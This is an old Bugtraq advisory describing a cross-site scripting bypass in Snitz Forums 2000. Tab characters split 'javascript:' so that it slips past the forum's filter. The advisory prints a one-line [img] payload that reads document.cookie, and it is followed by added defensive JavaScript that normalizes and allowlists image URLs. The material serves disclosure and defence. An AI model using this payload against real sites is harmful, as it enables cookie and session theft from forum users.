CrossSite Scripting @ Snitz Forums 2000

From: badwebmasters@online.de
Date: 04/17/03

    Date: 17 Apr 2003 18:33:38 -0000
    From: <badwebmasters@online.de>
    To: bugtraq@securityfocus.com
    
    

    Description:

    The BadWord-(Script-)Filter can be tricked by adding the Tab-Char (0x09)
    into the script command. This may lead to CrossSite-Scripting.

    Exploit:

    [img]jav asc ript:alert%28document.cookie%29[/img]

    Vendor:

    Has been contacted on 15. April.

    Patch:

    Available at http://int23.online.de/badwebmasters/txt/adv011.txt

    greetZ bWM

      -----------------------------------------------------
       badWebMasters - online security vs. web underground
             http://int23.online.de/badwebmasters
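
The bypass described in this advisory, seen from the defender's side, as an added example that is not part of the original post and is not Snitz Forums code: a substring blacklist misses the tab-split scheme, while normalizing the URL the way browsers do and allowlisting http/https rejects it. The function names, the sample post and the tab positions inside the payload are assumptions.

```javascript
// Hypothetical blacklist filter of the kind the advisory describes:
// it only looks for the literal substring "javascript:".
function naiveFilterAllows(url) {
  return !/javascript:/i.test(url);
}

// Browsers drop ASCII tab, LF and CR anywhere in a URL and trim leading and
// trailing control characters and spaces before they parse the scheme.
function normalizeLikeBrowser(url) {
  return url
    .replace(/[\t\n\r]/g, "")
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "");
}

const ALLOWED_SCHEMES = new Set(["http", "https"]);

// Allowlist check for an [img] URL: normalize first, then require an
// explicit http or https scheme. Everything else is rejected.
function isSafeImageUrl(url) {
  const normalized = normalizeLikeBrowser(String(url));
  const match = /^([a-z][a-z0-9+.-]*):/i.exec(normalized);
  if (!match) return false; // scheme-less or relative input is rejected
  return ALLOWED_SCHEMES.has(match[1].toLowerCase());
}

// Return the [img]...[/img] URLs in a post that fail the allowlist check.
function rejectedImageUrls(post) {
  const rejected = [];
  const re = /\[img\]([\s\S]*?)\[\/img\]/gi;
  let m;
  while ((m = re.exec(post)) !== null) {
    if (!isSafeImageUrl(m[1])) rejected.push(m[1]);
  }
  return rejected;
}

// Constructed sample post: the advisory's payload with tab characters
// (positions assumed) next to a benign image.
const samplePost =
  "[img]jav\tasc\tript:alert%28document.cookie%29[/img] " +
  "[img]https://example.com/a.png[/img]";
```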

